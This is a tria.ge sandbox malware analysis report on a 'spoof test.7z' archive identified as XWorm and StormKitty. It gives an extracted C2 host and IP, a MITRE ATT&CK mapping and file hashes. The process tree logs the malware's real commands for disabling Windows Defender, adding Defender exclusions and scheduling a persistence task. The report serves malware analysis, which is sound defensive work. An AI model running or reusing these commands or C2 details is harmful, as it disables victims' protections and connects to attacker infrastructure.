Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

spoof test.7z

windows11-21h2-x64

10

Resubmissions

04/12/2024, 22:25

241204-2b8m1szpej 10

04/12/2024, 22:22

241204-2adq9aznfm 10

Analysis

  • max time kernel
    542s
  • max time network
    543s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    04/12/2024, 22:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    spoof test.7z

  • Size

    50KB

  • MD5

    2b80931dfec2265ac0357414e27497f4

  • SHA1

    d7bfec86f61e214a8b43fcdcaaf82bda5e88557a

  • SHA256

    9f83ee8c3f2263e2400f1dc667c58520a846d81b12e8d15f62e4dfeba4389b3b

  • SHA512

    cb9443487acf4de4a33deb781ef206533cf5b4095671f08dd2b5607f388a82be8478b4db86b5ceaebb6f1dcd6958cd2d09399a0acea04ecb6d9368fb94cda203

  • SSDEEP

    768:AH1u19IsbaKCa8fll6kehelKR8e1vmrnwJU2O3QLp5OYgtf8aGZqfTn:AVuXIsqaSlRehZRBF+/pip/glOcTn

Score
10/10
stormkittyxwormdiscoveryevasionexecutionpersistenceransomwareratspywarestealertrojan

Malware Config

Extracted

Family

xworm

C2

database-recommendations.gl.at.ply.gg:17666

Attributes
  • Install_directory

    %AppData%

  • install_file

    System User.exe

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 2 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
    evasiontrojan
  • StormKitty

    StormKitty is an open source info stealer written in C#.

    stealerstormkitty
  • StormKitty payload 1 IoCs
  • Stormkitty family
    stormkitty
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

    execution
  • Drops startup file 2 IoCs
  • Executes dropped EXE 9 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Uses the VBS compiler for execution 1 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Suspicious use of SetThreadContext 1 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 25 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 54 IoCs
  • Suspicious use of FindShellTrayWindow 28 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:704
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies data under HKEY_USERS
        • Suspicious use of AdjustPrivilegeToken
        PID:2436
        • C:\Windows\system32\sc.exe
          "C:\Windows\system32\sc.exe" qc windefend
          3⤵
          • Launches sc.exe
          PID:1540
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
          3⤵
            PID:2520
          • C:\Windows\system32\whoami.exe
            "C:\Windows\system32\whoami.exe" /groups
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2400
          • C:\Windows\system32\net1.exe
            "C:\Windows\system32\net1.exe" stop windefend
            3⤵
              PID:4620
            • C:\Windows\system32\sc.exe
              "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
              3⤵
              • Launches sc.exe
              PID:1544
        • C:\Program Files\7-Zip\7zFM.exe
          "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\spoof test.7z"
          1⤵
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4636
          • C:\Users\Admin\AppData\Local\Temp\7zOC125BAA7\mapper.exe
            "C:\Users\Admin\AppData\Local\Temp\7zOC125BAA7\mapper.exe"
            2⤵
            • Modifies Windows Defender Real-time Protection settings
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Drops startup file
            • Executes dropped EXE
            • Adds Run key to start application
            • Sets desktop wallpaper using registry
            • Suspicious use of SetThreadContext
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3364
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zOC125BAA7\mapper.exe'
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1140
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mapper.exe'
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1084
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System User.exe'
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1852
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System User.exe'
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3600
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\Admin\AppData\Roaming\System User.exe"
              3⤵
              • Scheduled Task/Job: Scheduled Task
              PID:2776
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell" Get-MpPreference -verbose
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:808
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 147.185.221.24 17666 <123456789> BE143A27526902829F12
              3⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2220
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4972
                • C:\Windows\SysWOW64\explorer.exe
                  "C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2080
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
              3⤵
              • Enumerates system info in registry
              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:3456
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff929c3cb8,0x7fff929c3cc8,0x7fff929c3cd8
                4⤵
                  PID:3592
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,12378350441433728270,2346455643957148082,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1904 /prefetch:2
                  4⤵
                    PID:5020
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1896,12378350441433728270,2346455643957148082,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 /prefetch:3
                    4⤵
                      PID:2592
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1896,12378350441433728270,2346455643957148082,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2660 /prefetch:8
                      4⤵
                        PID:2968
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12378350441433728270,2346455643957148082,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:1
                        4⤵
                          PID:2912
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12378350441433728270,2346455643957148082,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1
                          4⤵
                            PID:3016
                          • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1896,12378350441433728270,2346455643957148082,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5400 /prefetch:8
                            4⤵
                              PID:2812
                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\w45wvyr4\w45wvyr4.cmdline"
                            3⤵
                              PID:1400
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB64E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD13BC8EF3E11494C85172E965FFA2C2.TMP"
                                4⤵
                                  PID:3972
                              • C:\Windows\system32\sc.exe
                                "C:\Windows\system32\sc.exe" qc windefend
                                3⤵
                                • Launches sc.exe
                                PID:3076
                              • C:\Windows\system32\cmd.exe
                                "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                3⤵
                                  PID:1484
                                • C:\Windows\system32\whoami.exe
                                  "C:\Windows\system32\whoami.exe" /groups
                                  3⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4800
                                • C:\Windows\system32\net1.exe
                                  "C:\Windows\system32\net1.exe" start TrustedInstaller
                                  3⤵
                                    PID:668
                                  • C:\Windows\system32\net1.exe
                                    "C:\Windows\system32\net1.exe" start lsass
                                    3⤵
                                      PID:1832
                                • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
                                  "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
                                  1⤵
                                  • Modifies registry class
                                  • Suspicious use of SetWindowsHookEx
                                  PID:2788
                                • C:\Users\Admin\AppData\Roaming\System User.exe
                                  "C:\Users\Admin\AppData\Roaming\System User.exe"
                                  1⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3208
                                • C:\Users\Admin\AppData\Roaming\System User.exe
                                  "C:\Users\Admin\AppData\Roaming\System User.exe"
                                  1⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1448
                                • C:\Users\Admin\AppData\Roaming\System User.exe
                                  "C:\Users\Admin\AppData\Roaming\System User.exe"
                                  1⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2844
                                • C:\Users\Admin\AppData\Roaming\System User.exe
                                  "C:\Users\Admin\AppData\Roaming\System User.exe"
                                  1⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4416
                                • C:\Users\Admin\AppData\Roaming\System User.exe
                                  "C:\Users\Admin\AppData\Roaming\System User.exe"
                                  1⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3908
                                • C:\Windows\explorer.exe
                                  C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                  1⤵
                                  • Modifies Internet Explorer settings
                                  • Modifies registry class
                                  • Suspicious behavior: AddClipboardFormatListener
                                  • Suspicious behavior: GetForegroundWindowSpam
                                  • Suspicious use of SetWindowsHookEx
                                  PID:3204
                                • C:\Windows\System32\rundll32.exe
                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
                                  1⤵
                                    PID:3956
                                  • C:\Users\Admin\AppData\Roaming\System User.exe
                                    "C:\Users\Admin\AppData\Roaming\System User.exe"
                                    1⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3772
                                  • C:\Windows\System32\CompPkgSrv.exe
                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                    1⤵
                                      PID:1664
                                    • C:\Windows\System32\CompPkgSrv.exe
                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                      1⤵
                                        PID:4832
                                      • C:\Users\Admin\AppData\Roaming\System User.exe
                                        "C:\Users\Admin\AppData\Roaming\System User.exe"
                                        1⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4652
                                      • C:\Users\Admin\AppData\Roaming\System User.exe
                                        "C:\Users\Admin\AppData\Roaming\System User.exe"
                                        1⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3368

                                      Network

                                      MITRE ATT&CK Enterprise v15

                                      Reconnaissance

                                      Resource Development

                                      Initial Access

                                      Execution

                                      Command and Scripting Interpreter

                                      2
                                      T1059

                                      PowerShell

                                      1
                                      T1059.001

                                      Scheduled Task/Job

                                      1
                                      T1053

                                      Scheduled Task

                                      1
                                      T1053.005

                                      Persistence

                                      Boot or Logon Autostart Execution

                                      1
                                      T1547

                                      Registry Run Keys / Startup Folder

                                      1
                                      T1547.001

                                      Create or Modify System Process

                                      1
                                      T1543

                                      Windows Service

                                      1
                                      T1543.003

                                      Scheduled Task/Job

                                      1
                                      T1053

                                      Scheduled Task

                                      1
                                      T1053.005

                                      Privilege Escalation

                                      Boot or Logon Autostart Execution

                                      1
                                      T1547

                                      Registry Run Keys / Startup Folder

                                      1
                                      T1547.001

                                      Create or Modify System Process

                                      1
                                      T1543

                                      Windows Service

                                      1
                                      T1543.003

                                      Scheduled Task/Job

                                      1
                                      T1053

                                      Scheduled Task

                                      1
                                      T1053.005

                                      Defense Evasion

                                      Impair Defenses

                                      1
                                      T1562

                                      Disable or Modify Tools

                                      1
                                      T1562.001

                                      Modify Registry

                                      4
                                      T1112

                                      Credential Access

                                      Credentials from Password Stores

                                      1
                                      T1555

                                      Credentials from Web Browsers

                                      1
                                      T1555.003

                                      Unsecured Credentials

                                      1
                                      T1552

                                      Credentials In Files

                                      1
                                      T1552.001

                                      Discovery

                                      Browser Information Discovery

                                      1
                                      T1217

                                      Query Registry

                                      2
                                      T1012

                                      System Information Discovery

                                      2
                                      T1082

                                      System Location Discovery

                                      1
                                      T1614

                                      System Language Discovery

                                      1
                                      T1614.001

                                      Lateral Movement

                                      Collection

                                      Data from Local System

                                      1
                                      T1005

                                      Command and Control

                                      Exfiltration

                                      Impact

                                      Defacement

                                      1
                                      T1491

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System User.exe.log
                                        Filesize

                                        654B

                                        MD5

                                        2cbbb74b7da1f720b48ed31085cbd5b8

                                        SHA1

                                        79caa9a3ea8abe1b9c4326c3633da64a5f724964

                                        SHA256

                                        e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

                                        SHA512

                                        ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                        Filesize

                                        2KB

                                        MD5

                                        627073ee3ca9676911bee35548eff2b8

                                        SHA1

                                        4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                                        SHA256

                                        85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                                        SHA512

                                        3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                        Filesize

                                        152B

                                        MD5

                                        c03d23a8155753f5a936bd7195e475bc

                                        SHA1

                                        cdf47f410a3ec000e84be83a3216b54331679d63

                                        SHA256

                                        6f5f7996d9b0e131dc2fec84859b7a8597c11a67dd41bdb5a5ef21a46e1ae0ca

                                        SHA512

                                        6ea9a631b454d7e795ec6161e08dbe388699012dbbc9c8cfdf73175a0ecd51204d45cf28a6f1706c8d5f1780666d95e46e4bc27752da9a9d289304f1d97c2f41

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                        Filesize

                                        152B

                                        MD5

                                        3d68c7edc2a288ee58e6629398bb9f7c

                                        SHA1

                                        6c1909dea9321c55cae38b8f16bd9d67822e2e51

                                        SHA256

                                        dfd733ed3cf4fb59f2041f82fdf676973783ffa75b9acca095609c7d4f73587b

                                        SHA512

                                        0eda66a07ec4cdb46b0f27d6c8cc157415d803af610b7430adac19547e121f380b9c6a2840f90fe49eaea9b48fa16079d93833c2bcf4b85e3c401d90d464ad2f

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History
                                        Filesize

                                        116KB

                                        MD5

                                        d4601354ecfc37b3f5053dd2913fea46

                                        SHA1

                                        d7a8d720b4e3c926004653568c9b9af73039218e

                                        SHA256

                                        5c1a5f341783ce158520e7bf210336aa75601bb02612b5d0059de4586b303686

                                        SHA512

                                        09724e62be06cad32eddb20c487945e364a52eb524e39b70ca04877bd3203f68a0fcd2cca2d99934bd9f9dd427e93da1bc8fa3aa87b52ed1ce06d10638b3b03a

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                        Filesize

                                        5KB

                                        MD5

                                        fc57f4a44e7d8da168b0aec1ebd07e81

                                        SHA1

                                        ebbbdba51af10eb141f3f6bb3f52777f1ddd3489

                                        SHA256

                                        a3f45d8a3d7f180f9c3dcc1ac1002b47930e4b071b35c634eb48529c3179a52c

                                        SHA512

                                        6c17d7644396b2e85c6e7628dc2761e86fd231532f50becc2cd8cc0ca48cb533dd69c1e790dcef083301532835c002975506b74e87a5f1baaba1c31e9b974787

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                        Filesize

                                        5KB

                                        MD5

                                        208805dc32dee88cac7124e29abda264

                                        SHA1

                                        2903b3e796a6ce9558b91b69a481e1d8d878068b

                                        SHA256

                                        59263a63160f106286ae7d5f3a7d5c8a56a5f57360b4111ce085d23c0f0e4745

                                        SHA512

                                        a6c8ba87dcd1bb6866e814d6eba609f00bf1722ad1082799ca81599db199be67340e17b89c254f0fbe09ca29b3a7010e0ab3a889429d98390c45d53e27afcbcd

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                        Filesize

                                        16B

                                        MD5

                                        6752a1d65b201c13b62ea44016eb221f

                                        SHA1

                                        58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                        SHA256

                                        0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                        SHA512

                                        9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                        Filesize

                                        10KB

                                        MD5

                                        a39c85e6c0dad9a344219919b5a2baab

                                        SHA1

                                        ff8d20b99adf6865eedd72b51eac555ebd3a4aea

                                        SHA256

                                        b80bfefbf4c2836e97cebe0f3d0f91cd68568f79dbd9fc3fbc90f471202bf234

                                        SHA512

                                        f2ba5788d6a9623faa6aecb8f3f1efc32a00a0f2ee037bbe85b5f98215f3872cc4ad3557cf69d6cc6183f42f029a0c891c55ea355487524e7ebf7a1244441b9e

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
                                        Filesize

                                        264KB

                                        MD5

                                        f50f89a0a91564d0b8a211f8921aa7de

                                        SHA1

                                        112403a17dd69d5b9018b8cede023cb3b54eab7d

                                        SHA256

                                        b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                        SHA512

                                        bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        Filesize

                                        944B

                                        MD5

                                        7c8d85aaf580c54e901f3d6968482b51

                                        SHA1

                                        bef8b0987808ef80f28f0040a6e94084ff8438c9

                                        SHA256

                                        1db55b56c11cb3f79b16ddd010b292950619499c3245ac7664b8f530c4421ee8

                                        SHA512

                                        04b7ca56cf966ee4d0b2cbac7cafc9aea3e8f116da26b1bf8924fdcd3480136f912e0491ed0b775d099ef571a791a167f43776e0831fac2dd078835c429f6df2

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        Filesize

                                        944B

                                        MD5

                                        a91dc07e15b39a46d314ca39a8df588e

                                        SHA1

                                        877b623728477f8663f79801afa5295e74c64404

                                        SHA256

                                        9b20cd28716b083005849335aa8b439c6e1000bc3c57eef76654acd7f1063f04

                                        SHA512

                                        32c1cab513b30417582318ebcecd7c57429ceaff3cc09dee8a9a82538907c9e3f1695bedbe01937638c9aa11354599bb9bd7810750a4b8bdeea911a83cc04ab3

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        Filesize

                                        944B

                                        MD5

                                        e3840d9bcedfe7017e49ee5d05bd1c46

                                        SHA1

                                        272620fb2605bd196df471d62db4b2d280a363c6

                                        SHA256

                                        3ac83e70415b9701ee71a4560232d7998e00c3db020fde669eb01b8821d2746f

                                        SHA512

                                        76adc88ab3930acc6b8b7668e2de797b8c00edcfc41660ee4485259c72a8adf162db62c2621ead5a9950f12bfe8a76ccab79d02fda11860afb0e217812cac376

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        Filesize

                                        944B

                                        MD5

                                        c8e142ee24a77ad7f21f6a741d48c8da

                                        SHA1

                                        2f174ae49dd03c3b2acd2f9cb2f4e1913908e749

                                        SHA256

                                        e81cbecfdbc457b5d8aad1fbd1dc29ab05e6425e9921bff30089f074ddfc6961

                                        SHA512

                                        ea1c13f3c559afbdfd63a6ecd2ca354612c3c29c2716156d5afcafe6d3fbd0e7eca7b1f03e68f3a28c78cbea5ec430285fa699facad72fc52a37fca207999799

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        Filesize

                                        11KB

                                        MD5

                                        ca0def7f8e939cda53123637d4021970

                                        SHA1

                                        232cf828ae9fb24d60b4e730f5755a7e07f00126

                                        SHA256

                                        6ae7ffe187f22ebfc5fac3cb119c3a2da07c92f5e5ee6098e529d9a60387f238

                                        SHA512

                                        0eedb8afcb3e4e8f6773a17dc825920ac28f530fdaddb91798eb0bf2c417c2b10277326e64c6188ff52a680a5f851df38bee1dc442abadece0cc0632f1a8e4b3

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        Filesize

                                        944B

                                        MD5

                                        4914eb0b2ff51bfa48484b5cc8454218

                                        SHA1

                                        6a7c3e36ce53b42497884d4c4a3bda438dd4374b

                                        SHA256

                                        7e510fc9344ef239ab1ab650dc95bb25fd44e2efba8b8246a3ac17880ee8b69e

                                        SHA512

                                        83ab35f622f4a5040ca5cb615a30f83bb0741449225f1fd1815b6923e225c28241d0c02d34f83f743349a5e57f84ca1c6f44016797a93d5985be41d11be79500

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
                                        Filesize

                                        10KB

                                        MD5

                                        d6d3499e5dfe058db4af5745e6885661

                                        SHA1

                                        ef47b148302484d5ab98320962d62565f88fcc18

                                        SHA256

                                        7ec1b67f891fb646b49853d91170fafc67ff2918befd877dcc8515212be560f6

                                        SHA512

